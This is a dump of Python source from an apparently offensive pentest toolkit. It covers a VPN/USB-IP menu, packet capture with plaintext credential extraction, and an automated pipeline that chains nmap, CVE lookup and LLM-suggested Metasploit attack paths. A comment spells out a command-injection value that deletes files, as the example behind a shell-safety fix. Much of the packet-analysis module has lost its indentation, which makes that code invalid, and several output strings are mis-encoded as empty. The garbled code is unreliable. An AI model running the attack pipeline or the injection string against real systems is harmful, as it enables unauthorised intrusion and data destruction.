        result = self.mgr.usbip_attach(ip, busid)
        if result.get('ok'):
            print(f" {result['message']}")
        else:
            print(f" Error: {result.get('error', 'Failed')}")
    def do_detach_usb(self):
        """Detach an attached USB/IP port."""
        # Show current ports
        ports = self.mgr.usbip_port_status()
        if not ports.get('ports'):
            print(" No attached USB/IP devices.")
            return
        print("\n Attached ports:")
        for p in ports['ports']:
            print(f" Port {p['port']}: {p['status']}")
        try:
            port = input(" Detach port #: ").strip()
        except (EOFError, KeyboardInterrupt):
            return
        if not port:
            return
        result = self.mgr.usbip_detach(port)
        if result.get('ok'):
            print(f" {result['message']}")
        else:
            print(f" Error: {result.get('error', 'Failed')}")
    def do_list_ports(self):
        """List currently attached USB/IP ports."""
        result = self.mgr.usbip_port_status()
        if not result.get('ok'):
            print(f" Error: {result.get('error', 'Failed')}")
            return
        ports = result.get('ports', [])
        if not ports:
            print(" No attached USB/IP ports.")
            return
        for p in ports:
            detail = f" - {p['detail']}" if p.get('detail') else ''
            print(f" Port {p['port']}: {p['status']}{detail}")
    # ── Config ─────────────────────────────────────────────────────
    def do_gen_config(self):
        """Print a selected client's full WireGuard config."""
        client = self._pick_client()
        if not client:
            return
        config = self.mgr.generate_client_config(client)
        print(f"\n Config for {client['name']}:\n")
        # FIX: the separator multiplied an empty string (a mis-encoded
        # box-drawing glyph), printing nothing; use a visible rule.
        print(f" {'-' * 40}")
        for line in config.split('\n'):
            print(f" {line}")
        print(f" {'-' * 40}")
    def do_show_qr(self):
        """Render the client config as an ASCII QR code (needs qrcode)."""
        client = self._pick_client()
        if not client:
            return
        config = self.mgr.generate_client_config(client)
        try:
            import qrcode
            qr = qrcode.QRCode(box_size=1, border=1)
            qr.add_data(config)
            qr.make(fit=True)
            qr.print_ascii(invert=True)
        except ImportError:
            print(" qrcode module not installed. Install: pip install qrcode")
    def do_refresh_upnp(self):
        """Re-request the router's UPnP port mapping for WireGuard."""
        print(" Refreshing UPnP mapping for WireGuard port...")
        result = self.mgr.refresh_upnp_mapping()
        if result.get('ok'):
            print(f" UPnP mapping refreshed.")
        else:
            print(f" Error: {result.get('error', 'Failed')}")
    # ── Main Loop ──────────────────────────────────────────────────
    def run_interactive(self):
        """Menu loop: dispatch numeric choices until the user exits."""
        while True:
            self.show_menu()
            try:
                choice = input(" Select > ").strip()
            except (EOFError, KeyboardInterrupt):
                break
            if choice == '0':
                break
            actions = {
                '1': self.do_server_status,
                '2': self.do_start,
                '3': self.do_stop,
                '4': self.do_restart,
                '10': self.do_list_clients,
                '11': self.do_create_client,
                '12': self.do_view_client,
                '13': self.do_delete_client,
                '14': self.do_toggle_client,
                '15': self.do_import_peers,
                '20': self.do_adb_connect,
                '21': self.do_adb_disconnect,
                '22': self.do_auto_connect,
                '23': self.do_list_adb_devices,
                '30': self.do_usbip_status,
                '31': self.do_load_modules,
                '32': self.do_list_remote_usb,
                '33': self.do_attach_usb,
                '34': self.do_detach_usb,
                '35': self.do_list_ports,
                '40': self.do_gen_config,
                '41': self.do_show_qr,
                '42': self.do_refresh_upnp,
            }
            action = actions.get(choice)
            if action:
                action()
            else:
                print(" Invalid choice.")
def run():
    """Module entry point: launch the interactive WireGuard menu."""
    WireGuardVPN().run_interactive()

283
modules/wireshark.py Normal file
View File

@@ -0,0 +1,283 @@
"""
AUTARCH Wireshark Module
Packet capture and analysis (scapy + optional tshark)
Live capture, PCAP analysis, protocol/conversation/DNS/HTTP analysis,
credential detection.
"""
import os
import sys
from pathlib import Path
# Module metadata
DESCRIPTION = "Packet capture & analysis (scapy)"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors, clear_screen, display_banner
from core.wireshark import get_wireshark_manager
class PacketAnalyzer:
"""Packet capture and analysis tools."""
def __init__(self):
self.mgr = get_wireshark_manager()
def print_status(self, message: str, status: str = "info"):
    """Print a colorized status line ([*]/[+]/[!]/[X]) by severity."""
    palette = {"info": Colors.CYAN, "success": Colors.GREEN, "warning": Colors.YELLOW, "error": Colors.RED}
    marks = {"info": "*", "success": "+", "warning": "!", "error": "X"}
    color = palette.get(status, Colors.WHITE)
    mark = marks.get(status, '*')
    print(f"{color}[{mark}] {message}{Colors.RESET}")
def show_menu(self):
    """Main packet-analysis menu loop.

    Shows engine availability (scapy/tshark, root for live capture) and
    dispatches to the capture/analysis actions until the user selects 0.
    """
    while True:
        clear_screen()
        display_banner()
        print(f"\n{Colors.BOLD}Wireshark / Packet Analysis{Colors.RESET}")
        # Status
        status = self.mgr.get_status()
        engine = []
        if status['scapy']:
            engine.append(f'{Colors.GREEN}scapy{Colors.RESET}')
        else:
            engine.append(f'{Colors.RED}scapy (missing){Colors.RESET}')
        if status['tshark']:
            engine.append(f'{Colors.GREEN}tshark{Colors.RESET}')
        else:
            engine.append(f'{Colors.YELLOW}tshark (not found){Colors.RESET}')
        print(f" Engine: {' + '.join(engine)}")
        if status['can_capture']:
            print(f" Live capture: {Colors.GREEN}available{Colors.RESET}")
        else:
            print(f" Live capture: {Colors.YELLOW}needs root{Colors.RESET}")
        print(f"\n {Colors.CYAN}[1]{Colors.RESET} List Interfaces")
        print(f" {Colors.CYAN}[2]{Colors.RESET} Start Live Capture")
        print(f" {Colors.CYAN}[3]{Colors.RESET} Open PCAP File")
        print(f" {Colors.CYAN}[4]{Colors.RESET} Protocol Analysis")
        print(f" {Colors.CYAN}[5]{Colors.RESET} Conversation Analysis")
        print(f" {Colors.CYAN}[6]{Colors.RESET} DNS Query Analysis")
        print(f" {Colors.CYAN}[7]{Colors.RESET} HTTP Traffic Analysis")
        print(f" {Colors.CYAN}[8]{Colors.RESET} Credential Detection")
        print(f" {Colors.CYAN}[9]{Colors.RESET} Export Results")
        print(f" {Colors.CYAN}[0]{Colors.RESET} Back")
        choice = input(f"\n{Colors.WHITE}Select option: {Colors.RESET}").strip()
        if choice == '0':
            break
        elif choice == '1':
            self.list_interfaces()
        elif choice == '2':
            self.start_capture()
        elif choice == '3':
            self.open_pcap()
        elif choice == '4':
            self.protocol_analysis()
        elif choice == '5':
            self.conversation_analysis()
        elif choice == '6':
            self.dns_analysis()
        elif choice == '7':
            self.http_analysis()
        elif choice == '8':
            self.credential_detection()
        elif choice == '9':
            self.export_results()
def list_interfaces(self):
    """Print the capture-capable network interfaces, numbered."""
    print(f"\n{Colors.BOLD}Network Interfaces{Colors.RESET}")
    found = self.mgr.list_interfaces()
    if not found:
        self.print_status("No interfaces found", "error")
    else:
        for idx, iface in enumerate(found, 1):
            if iface.get('description'):
                desc = f" ({iface['description']})"
            else:
                desc = ''
            print(f" {Colors.CYAN}{idx}.{Colors.RESET} {iface['name']}{desc}")
    input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
    def start_capture(self):
        """Start a live packet capture.

        Interactively prompts for interface, optional BPF filter, and
        duration, then polls capture statistics once per second until the
        capture stops (or the user interrupts with Ctrl+C) and reports
        the final packet count and output file.
        """
        print(f"\n{Colors.BOLD}Live Capture{Colors.RESET}")
        if not self.mgr.can_capture:
            self.print_status("Root privileges required for live capture", "error")
            input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
            return
        # Show interfaces
        interfaces = self.mgr.list_interfaces()
        for i, iface in enumerate(interfaces, 1):
            print(f"  {i}. {iface['name']}")
        iface_input = input(f"\n{Colors.WHITE}Interface (name or number, Enter for default): {Colors.RESET}").strip()
        interface = None
        if iface_input:
            try:
                # Numeric selection is 1-based; an out-of-range number
                # silently falls back to the default (interface stays None).
                idx = int(iface_input) - 1
                if 0 <= idx < len(interfaces):
                    interface = interfaces[idx]['name']
            except ValueError:
                # Non-numeric input is used verbatim as the interface name.
                interface = iface_input
        bpf = input(f"{Colors.WHITE}BPF filter (e.g., 'tcp port 80', Enter for all): {Colors.RESET}").strip() or None
        duration_str = input(f"{Colors.WHITE}Duration in seconds (default 30): {Colors.RESET}").strip()
        duration = int(duration_str) if duration_str.isdigit() else 30
        self.print_status(f"Starting capture on {interface or 'default'} for {duration}s...", "info")
        result = self.mgr.start_capture(interface=interface, bpf_filter=bpf, duration=duration)
        if 'error' in result:
            self.print_status(result['error'], "error")
            input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
            return
        self.print_status(f"Capturing... Output: {result.get('file', '')}", "info")
        # Wait for capture to complete
        import time
        try:
            # Poll once per second, rewriting the packet counter in place.
            while self.mgr._capture_running:
                stats = self.mgr.get_capture_stats()
                print(f"\r  Packets: {stats.get('packet_count', 0)}", end='', flush=True)
                time.sleep(1)
        except KeyboardInterrupt:
            # Ctrl+C stops the capture early; results are still reported below.
            self.mgr.stop_capture()
        stats = self.mgr.get_capture_stats()
        print()
        self.print_status(f"Capture complete: {stats.get('packet_count', 0)} packets", "success")
        if stats.get('output_file'):
            self.print_status(f"Saved to: {stats['output_file']}", "info")
        input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def open_pcap(self):
"""Open and load a PCAP file."""
print(f"\n{Colors.BOLD}Open PCAP File{Colors.RESET}")
filepath = input(f"{Colors.WHITE}PCAP file path: {Colors.RESET}").strip()
if not filepath:
return
self.print_status(f"Loading {filepath}...", "info")
result = self.mgr.read_pcap(filepath)
if 'error' in result:
self.print_status(result['error'], "error")
else:
self.print_status(f"Loaded {result['total_packets']} packets from {result['file']}", "success")
# Show first few packets
for pkt in result['packets'][:20]:
print(f" {pkt.get('src','?'):>15} -> {pkt.get('dst','?'):<15} {pkt.get('protocol',''):>8} {pkt.get('info','')}")
if result['total_packets'] > 20:
print(f" ... and {result['total_packets'] - 20} more packets")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def protocol_analysis(self):
"""Show protocol distribution."""
print(f"\n{Colors.BOLD}Protocol Analysis{Colors.RESET}")
result = self.mgr.get_protocol_hierarchy()
if result['total'] == 0:
self.print_status("No packets loaded. Open a PCAP or run a capture first.", "warning")
else:
print(f" Total packets: {result['total']}\n")
for proto, data in result['protocols'].items():
bar_len = int(data['percent'] / 2)
bar = '' * bar_len
print(f" {proto:<12} {data['count']:>6} {data['percent']:>5.1f}% {Colors.CYAN}{bar}{Colors.RESET}")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def conversation_analysis(self):
"""Show IP conversations."""
print(f"\n{Colors.BOLD}Conversation Analysis{Colors.RESET}")
convos = self.mgr.extract_conversations()
if not convos:
self.print_status("No packets loaded.", "warning")
else:
print(f" {'Source':<20} {'Destination':<20} {'Packets':>8} {'Bytes':>10} {'Protocols'}")
print(f" {''*20} {''*20} {''*8} {''*10} {''*20}")
for c in convos[:30]:
protos = ', '.join(c['protocols'][:3])
print(f" {c['src']:<20} {c['dst']:<20} {c['packets']:>8} {c['bytes']:>10} {protos}")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def dns_analysis(self):
"""Show DNS queries."""
print(f"\n{Colors.BOLD}DNS Query Analysis{Colors.RESET}")
queries = self.mgr.extract_dns_queries()
if not queries:
self.print_status("No DNS queries found.", "warning")
else:
print(f" {'Query':<40} {'Type':<6} {'Count':>6} {'Response'}")
print(f" {''*40} {''*6} {''*6} {''*30}")
for q in queries[:40]:
resp = q.get('response', '')[:30]
print(f" {q['query']:<40} {q['type']:<6} {q['count']:>6} {resp}")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def http_analysis(self):
"""Show HTTP requests."""
print(f"\n{Colors.BOLD}HTTP Traffic Analysis{Colors.RESET}")
requests = self.mgr.extract_http_requests()
if not requests:
self.print_status("No HTTP requests found.", "warning")
else:
for r in requests[:30]:
method = r.get('method', '?')
host = r.get('host', '')
path = r.get('path', '')[:60]
src = r.get('src', '')
color = Colors.GREEN if method == 'GET' else Colors.YELLOW
print(f" {color}{method:<7}{Colors.RESET} {host}{path} from {src}")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def credential_detection(self):
"""Detect plaintext credentials."""
print(f"\n{Colors.BOLD}Credential Detection{Colors.RESET}")
creds = self.mgr.extract_credentials()
if not creds:
self.print_status("No plaintext credentials detected.", "info")
else:
self.print_status(f"Found {len(creds)} credential artifacts!", "warning")
for c in creds:
print(f" {Colors.RED}[{c['protocol']}]{Colors.RESET} {c['type']}: {c['value']} ({c['src']} -> {c['dst']})")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def export_results(self):
"""Export packets."""
print(f"\n{Colors.BOLD}Export Results{Colors.RESET}")
print(f" {Colors.CYAN}[1]{Colors.RESET} Export as JSON")
print(f" {Colors.CYAN}[2]{Colors.RESET} Export as CSV")
choice = input(f"\n{Colors.WHITE}Select format: {Colors.RESET}").strip()
fmt = 'csv' if choice == '2' else 'json'
result = self.mgr.export_packets(fmt=fmt)
if 'error' in result:
self.print_status(result['error'], "error")
else:
self.print_status(f"Exported {result['count']} packets to {result['filepath']}", "success")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def run():
    """Module entry point."""
    # Launches the interactive packet-analysis menu loop; blocks until
    # the user backs out of the menu.
    analyzer = PacketAnalyzer()
    analyzer.show_menu()

549
modules/workflow.py Normal file
View File

@@ -0,0 +1,549 @@
"""
AUTARCH Workflow Module
Automated pentest pipeline orchestration
Run multi-step security assessments with automated data flow between tools.
"""
import os
import sys
import json
import subprocess
import re
import time
from pathlib import Path
from datetime import datetime
# Module metadata
DESCRIPTION = "Automated pentest workflow"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "offense"
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors, clear_screen, display_banner
class WorkflowRunner:
    """Orchestrate multi-step pentest workflows.

    Pipeline: nmap service detection -> CVE correlation -> exploit
    suggestion (LLM, with Metasploit-module fallback) -> HTML report.
    State is checkpointed to a JSON file under ./results after every
    step so an interrupted run can be resumed from the Resume menu.
    """
    def __init__(self):
        # Workflow state files and generated reports live under ./results.
        self.results_dir = Path("results")
        self.results_dir.mkdir(exist_ok=True)
    def print_status(self, msg, level="info"):
        """Print a colour-coded status line ([*] info, [+] success, [!] warning, [-] error)."""
        icons = {"info": f"{Colors.CYAN}[*]", "success": f"{Colors.GREEN}[+]",
                 "warning": f"{Colors.YELLOW}[!]", "error": f"{Colors.RED}[-]"}
        icon = icons.get(level, icons["info"])
        print(f"  {icon} {msg}{Colors.RESET}")
    # =========================================================================
    # MENU
    # =========================================================================
    def show_menu(self):
        """Clear the screen and draw the top-level workflow menu."""
        clear_screen()
        display_banner()
        print(f"{Colors.RED}{Colors.BOLD}  Automated Workflow{Colors.RESET}")
        print(f"{Colors.DIM}  Multi-step pentest pipeline orchestration{Colors.RESET}")
        print(f"{Colors.DIM}  {'─' * 50}{Colors.RESET}")
        print()
        print(f"  {Colors.RED}[1]{Colors.RESET} New Workflow {Colors.DIM}- Full automated pipeline{Colors.RESET}")
        print(f"  {Colors.RED}[2]{Colors.RESET} Quick Scan {Colors.DIM}- Nmap → CVE → Report (no LLM){Colors.RESET}")
        print(f"  {Colors.RED}[3]{Colors.RESET} Resume Workflow {Colors.DIM}- Load saved state{Colors.RESET}")
        print()
        print(f"  {Colors.DIM}[0]{Colors.RESET} Back")
        print()
    # =========================================================================
    # NMAP SCAN (shared helper)
    # =========================================================================
    def _nmap_service_scan(self, target):
        """Run nmap service detection scan on target.

        Args:
            target: IP address or hostname to scan (user-supplied).

        Returns:
            List of dicts with 'port', 'protocol', 'service', 'version'
            keys; empty list on scan failure or timeout.
        """
        self.print_status(f"Running nmap -sV -T4 on {target}...", "info")
        try:
            # SECURITY FIX: pass argv as a list with shell=False so a
            # hostile target string (e.g. "1.2.3.4; rm -rf /") cannot
            # inject extra shell commands.  The previous code built a
            # shell command string from user input with shell=True.
            result = subprocess.run(
                ["nmap", "-sV", "--top-ports", "20", "-T4", target],
                capture_output=True, text=True, timeout=300
            )
            if result.returncode != 0:
                self.print_status("nmap scan failed", "error")
                return []
            services = []
            # Matches lines like "22/tcp open ssh OpenSSH 8.9" from nmap output.
            port_re = re.compile(r'(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)')
            for line in result.stdout.split('\n'):
                m = port_re.match(line.strip())
                if m:
                    parts = m.group(4).strip().split()
                    services.append({
                        'port': int(m.group(1)),
                        'protocol': m.group(2),
                        # Prefer the product name from the version column
                        # over nmap's generic service name when available.
                        'service': parts[0] if parts else m.group(3),
                        'version': ' '.join(parts[1:]) if len(parts) > 1 else ''
                    })
            self.print_status(f"Found {len(services)} open services", "success")
            return services
        except subprocess.TimeoutExpired:
            self.print_status("nmap timed out after 5 minutes", "error")
            return []
        except Exception as e:
            # Also covers FileNotFoundError when nmap is not installed.
            self.print_status(f"Scan error: {e}", "error")
            return []
    # =========================================================================
    # CVE CORRELATION (shared helper)
    # =========================================================================
    def _correlate_cves(self, services):
        """Correlate services with CVEs from the database.

        Tries an exact CPE 2.3 match first, then falls back to a keyword
        search of "<service> <version>".  Results are capped at 20 CVEs
        per service.

        Args:
            services: List of service dicts from _nmap_service_scan().

        Returns:
            List of {'service': ..., 'cves': [...]} dicts (one per service);
            empty list when the CVE database is unavailable.
        """
        try:
            from core.cve import get_cve_db
            cve_db = get_cve_db()
        except Exception as e:
            self.print_status(f"CVE database unavailable: {e}", "warning")
            return []
        # Maps nmap service names to (vendor, product) pairs for CPE lookup.
        SERVICE_TO_CPE = {
            'apache': ('apache', 'http_server'), 'nginx': ('f5', 'nginx'),
            'openssh': ('openbsd', 'openssh'), 'ssh': ('openbsd', 'openssh'),
            'mysql': ('oracle', 'mysql'), 'postgresql': ('postgresql', 'postgresql'),
            'samba': ('samba', 'samba'), 'smb': ('samba', 'samba'),
            'vsftpd': ('vsftpd_project', 'vsftpd'), 'proftpd': ('proftpd', 'proftpd'),
            'postfix': ('postfix', 'postfix'), 'dovecot': ('dovecot', 'dovecot'),
            'php': ('php', 'php'), 'tomcat': ('apache', 'tomcat'),
            'isc': ('isc', 'bind'), 'bind': ('isc', 'bind'),
        }
        correlations = []
        for svc in services:
            self.print_status(f"Checking CVEs for {svc['service']}:{svc.get('version', '?')} on port {svc['port']}...", "info")
            cves = []
            svc_lower = svc['service'].lower()
            # Use only the first token of the version string (e.g. "8.9p1").
            version = svc.get('version', '').split()[0] if svc.get('version') else ''
            if svc_lower in SERVICE_TO_CPE and version:
                vendor, product = SERVICE_TO_CPE[svc_lower]
                cpe = f"cpe:2.3:a:{vendor}:{product}:{version}:*:*:*:*:*:*:*"
                try:
                    cves = cve_db.search_cves(cpe_pattern=cpe)
                except Exception:
                    pass
            if not cves and version:
                # Fallback: free-text keyword search.
                try:
                    cves = cve_db.search_cves(keyword=f"{svc['service']} {version}")
                except Exception:
                    pass
            if cves:
                self.print_status(f"  Found {len(cves)} CVEs", "success")
            else:
                self.print_status("  No CVEs found", "info")
            correlations.append({
                'service': svc,
                'cves': cves[:20]  # cap per service
            })
        return correlations
    # =========================================================================
    # FULL WORKFLOW
    # =========================================================================
    def run_workflow(self, target):
        """Run full automated pentest workflow.

        Four interactive steps (scan, CVE correlation, exploit suggestion,
        report); the user may stop after any step and the saved JSON state
        allows resuming later.
        """
        clear_screen()
        display_banner()
        print(f"{Colors.RED}{Colors.BOLD}  Full Workflow - {target}{Colors.RESET}")
        print(f"{Colors.DIM}  {'─' * 50}{Colors.RESET}")
        print()
        state = {
            'target': target,
            'started': datetime.now().isoformat(),
            'services': [],
            'correlations': [],
            'exploits': [],
            'report': None,
            'current_step': 1
        }
        # Filename is sanitized so IPs/CIDRs produce valid path components.
        state_file = self.results_dir / f"workflow_{target.replace('.', '-').replace('/', '_')}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
        # Step 1: Nmap scan
        print(f"\n{Colors.CYAN}{Colors.BOLD}  Step 1/4: Service Detection{Colors.RESET}")
        print(f"{Colors.DIM}  {'─' * 40}{Colors.RESET}")
        services = self._nmap_service_scan(target)
        state['services'] = services
        state['current_step'] = 2
        self._save_state(state, state_file)
        if not services:
            self.print_status("No services found. Workflow cannot continue.", "warning")
            input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
            return
        cont = input(f"\n{Colors.WHITE}  Continue to CVE correlation? [Y/n]: {Colors.RESET}").strip().lower()
        if cont == 'n':
            self.print_status(f"State saved to {state_file}", "info")
            input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
            return
        # Step 2: CVE correlation
        print(f"\n{Colors.CYAN}{Colors.BOLD}  Step 2/4: CVE Correlation{Colors.RESET}")
        print(f"{Colors.DIM}  {'─' * 40}{Colors.RESET}")
        correlations = self._correlate_cves(services)
        state['correlations'] = correlations
        state['current_step'] = 3
        self._save_state(state, state_file)
        total_cves = sum(len(c.get('cves', [])) for c in correlations)
        self.print_status(f"Total CVEs found: {total_cves}", "success" if total_cves > 0 else "info")
        cont = input(f"\n{Colors.WHITE}  Continue to exploit suggestion? [Y/n]: {Colors.RESET}").strip().lower()
        if cont == 'n':
            # Skip to report
            self._generate_workflow_report(state)
            input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
            return
        # Step 3: Exploit suggestion (LLM)
        print(f"\n{Colors.CYAN}{Colors.BOLD}  Step 3/4: Exploit Suggestion{Colors.RESET}")
        print(f"{Colors.DIM}  {'─' * 40}{Colors.RESET}")
        exploits = self._suggest_exploits(services, correlations)
        state['exploits'] = exploits
        state['current_step'] = 4
        self._save_state(state, state_file)
        cont = input(f"\n{Colors.WHITE}  Generate report? [Y/n]: {Colors.RESET}").strip().lower()
        if cont == 'n':
            self.print_status(f"State saved to {state_file}", "info")
            input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
            return
        # Step 4: Report
        print(f"\n{Colors.CYAN}{Colors.BOLD}  Step 4/4: Report Generation{Colors.RESET}")
        print(f"{Colors.DIM}  {'─' * 40}{Colors.RESET}")
        self._generate_workflow_report(state)
        state['current_step'] = 5
        self._save_state(state, state_file)
        input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
    # =========================================================================
    # QUICK SCAN
    # =========================================================================
    def quick_scan(self, target):
        """Run quick scan: Nmap → CVE → Report (no LLM).

        Non-interactive between steps; no state file is written.
        """
        clear_screen()
        display_banner()
        print(f"{Colors.RED}{Colors.BOLD}  Quick Scan - {target}{Colors.RESET}")
        print(f"{Colors.DIM}  {'─' * 50}{Colors.RESET}")
        print()
        start_time = time.time()
        # Step 1: Nmap
        print(f"\n{Colors.CYAN}{Colors.BOLD}  Step 1/3: Service Detection{Colors.RESET}")
        print(f"{Colors.DIM}  {'─' * 40}{Colors.RESET}")
        services = self._nmap_service_scan(target)
        if not services:
            self.print_status("No services found.", "warning")
            input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
            return
        # Step 2: CVE correlation
        print(f"\n{Colors.CYAN}{Colors.BOLD}  Step 2/3: CVE Correlation{Colors.RESET}")
        print(f"{Colors.DIM}  {'─' * 40}{Colors.RESET}")
        correlations = self._correlate_cves(services)
        total_cves = sum(len(c.get('cves', [])) for c in correlations)
        self.print_status(f"Total CVEs found: {total_cves}", "success" if total_cves > 0 else "info")
        # Step 3: Report
        print(f"\n{Colors.CYAN}{Colors.BOLD}  Step 3/3: Report Generation{Colors.RESET}")
        print(f"{Colors.DIM}  {'─' * 40}{Colors.RESET}")
        scan_time = time.time() - start_time
        state = {
            'target': target,
            'services': services,
            'correlations': correlations,
            'exploits': [],
            'scan_time': scan_time
        }
        self._generate_workflow_report(state)
        self.print_status(f"Quick scan completed in {scan_time:.1f}s", "success")
        input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
    # =========================================================================
    # RESUME WORKFLOW
    # =========================================================================
    def resume_workflow(self):
        """Resume a saved workflow from JSON state.

        Lists workflow_*.json files under results/, lets the user pick
        one, then re-runs the pipeline starting at the saved step (steps
        already completed reuse their stored data).
        """
        clear_screen()
        display_banner()
        print(f"{Colors.RED}{Colors.BOLD}  Resume Workflow{Colors.RESET}")
        print(f"{Colors.DIM}  {'─' * 50}{Colors.RESET}")
        print()
        state_files = sorted(self.results_dir.glob("workflow_*.json"))
        if not state_files:
            self.print_status("No saved workflows found.", "warning")
            input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
            return
        for i, f in enumerate(state_files, 1):
            try:
                with open(f, 'r') as fh:
                    data = json.load(fh)
                target = data.get('target', '?')
                step = data.get('current_step', '?')
                started = data.get('started', '?')
                print(f"  {Colors.RED}[{i}]{Colors.RESET} {f.name}")
                print(f"      {Colors.DIM}Target: {target} | Step: {step}/4 | Started: {started}{Colors.RESET}")
            except Exception:
                # Unreadable/invalid JSON state files are listed but flagged.
                print(f"  {Colors.RED}[{i}]{Colors.RESET} {f.name} {Colors.DIM}(corrupt){Colors.RESET}")
        print(f"\n  {Colors.DIM}[0]{Colors.RESET} Back")
        sel = input(f"\n{Colors.WHITE}  Select: {Colors.RESET}").strip()
        if sel == "0":
            return
        try:
            idx = int(sel) - 1
            with open(state_files[idx], 'r') as f:
                state = json.load(f)
        except (ValueError, IndexError, json.JSONDecodeError) as e:
            self.print_status(f"Error: {e}", "error")
            input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
            return
        target = state.get('target', '')
        current_step = state.get('current_step', 1)
        state_file = state_files[idx]
        self.print_status(f"Resuming workflow for {target} at step {current_step}/4", "info")
        # Each stage below either re-runs (if not yet done) or reloads
        # its saved output from the state dict.
        if current_step <= 1:
            services = self._nmap_service_scan(target)
            state['services'] = services
            state['current_step'] = 2
            self._save_state(state, state_file)
        else:
            services = state.get('services', [])
        if not services:
            self.print_status("No services available.", "warning")
            input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
            return
        if current_step <= 2:
            print(f"\n{Colors.CYAN}{Colors.BOLD}  Step 2/4: CVE Correlation{Colors.RESET}")
            correlations = self._correlate_cves(services)
            state['correlations'] = correlations
            state['current_step'] = 3
            self._save_state(state, state_file)
        else:
            correlations = state.get('correlations', [])
        if current_step <= 3:
            cont = input(f"\n{Colors.WHITE}  Run exploit suggestion? [Y/n]: {Colors.RESET}").strip().lower()
            if cont != 'n':
                print(f"\n{Colors.CYAN}{Colors.BOLD}  Step 3/4: Exploit Suggestion{Colors.RESET}")
                exploits = self._suggest_exploits(services, correlations)
                state['exploits'] = exploits
                state['current_step'] = 4
                self._save_state(state, state_file)
        if current_step <= 4:
            print(f"\n{Colors.CYAN}{Colors.BOLD}  Step 4/4: Report Generation{Colors.RESET}")
            self._generate_workflow_report(state)
            state['current_step'] = 5
            self._save_state(state, state_file)
        input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
    # =========================================================================
    # HELPERS
    # =========================================================================
    def _suggest_exploits(self, services, correlations):
        """Try LLM-based exploit suggestion, fallback to CVE-MSF lookup.

        Args:
            services: Service dicts from _nmap_service_scan().
            correlations: Output of _correlate_cves().

        Returns:
            List of {'module', 'target', 'cve', 'reasoning'} dicts
            (possibly empty).
        """
        exploits = []
        # Collect all CVEs
        all_cves = []
        for corr in correlations:
            for cve in corr.get('cves', []):
                all_cves.append(cve)
        if not all_cves:
            self.print_status("No CVEs to suggest exploits for.", "info")
            return []
        # Try LLM
        try:
            from core.llm import get_llm
            llm = get_llm()
            if llm and llm.is_loaded():
                self.print_status("Using LLM for exploit suggestions...", "info")
                svc_text = "\n".join(
                    f"- {s['service']}:{s.get('version', '?')} on port {s['port']}"
                    for s in services
                )
                cve_text = "\n".join(
                    f"- {c.get('id', '?')} (CVSS {c.get('cvss', '?')}): {c.get('description', '')[:100]}"
                    for c in all_cves[:20]
                )
                prompt = f"""Given these services and vulnerabilities, suggest the top 5 attack paths.
Services:
{svc_text}
CVEs:
{cve_text}
For each suggestion provide: rank, Metasploit module path (if known), target service, CVE, and reasoning.
Format each as: N. MODULE | TARGET | CVE | REASONING"""
                response = llm.generate(prompt)
                if response:
                    # Parse suggestions
                    for line in response.split('\n'):
                        line = line.strip()
                        # Expected shape: "1. module | target | CVE | why".
                        match = re.match(r'\d+\.\s*(.+?)\s*\|\s*(.+?)\s*\|\s*(.+?)\s*\|\s*(.+)', line)
                        if match:
                            exploits.append({
                                'module': match.group(1).strip(),
                                'target': match.group(2).strip(),
                                'cve': match.group(3).strip(),
                                'reasoning': match.group(4).strip()
                            })
                if exploits:
                    self.print_status(f"LLM suggested {len(exploits)} attack paths", "success")
                    for i, exp in enumerate(exploits, 1):
                        # Fix: module and target were concatenated with no
                        # separator; insert an arrow between them.
                        print(f"  {Colors.RED}{i}.{Colors.RESET} {exp['module']} → {exp['target']} ({exp['cve']})")
                    return exploits
        except Exception:
            pass
        # Fallback: CVE-to-MSF mapping
        self.print_status("LLM unavailable, using CVE-to-MSF module lookup...", "warning")
        try:
            from core.msf_modules import search_modules
            for cve in all_cves[:30]:
                cve_id = cve.get('id', '')
                if cve_id:
                    matches = search_modules(cve_id)
                    for mod_name, mod_info in matches:
                        exploits.append({
                            'module': mod_name,
                            'target': mod_info.get('description', '')[:60],
                            'cve': cve_id,
                            'reasoning': f"Direct CVE match (CVSS {cve.get('cvss', '?')})"
                        })
        except Exception as e:
            self.print_status(f"MSF module lookup failed: {e}", "warning")
        if exploits:
            self.print_status(f"Found {len(exploits)} exploit matches", "success")
            for i, exp in enumerate(exploits[:10], 1):
                print(f"  {Colors.RED}{i}.{Colors.RESET} {exp['module']} ({exp['cve']})")
        else:
            self.print_status("No exploit matches found.", "info")
        return exploits
    def _generate_workflow_report(self, state):
        """Generate HTML report from workflow state.

        Stores the resulting report path back into state['report'] on
        success; failures are reported but not raised.
        """
        target = state.get('target', 'unknown')
        # Build network_data from services
        network_data = None
        services = state.get('services', [])
        if services:
            network_data = [{
                'ip': target,
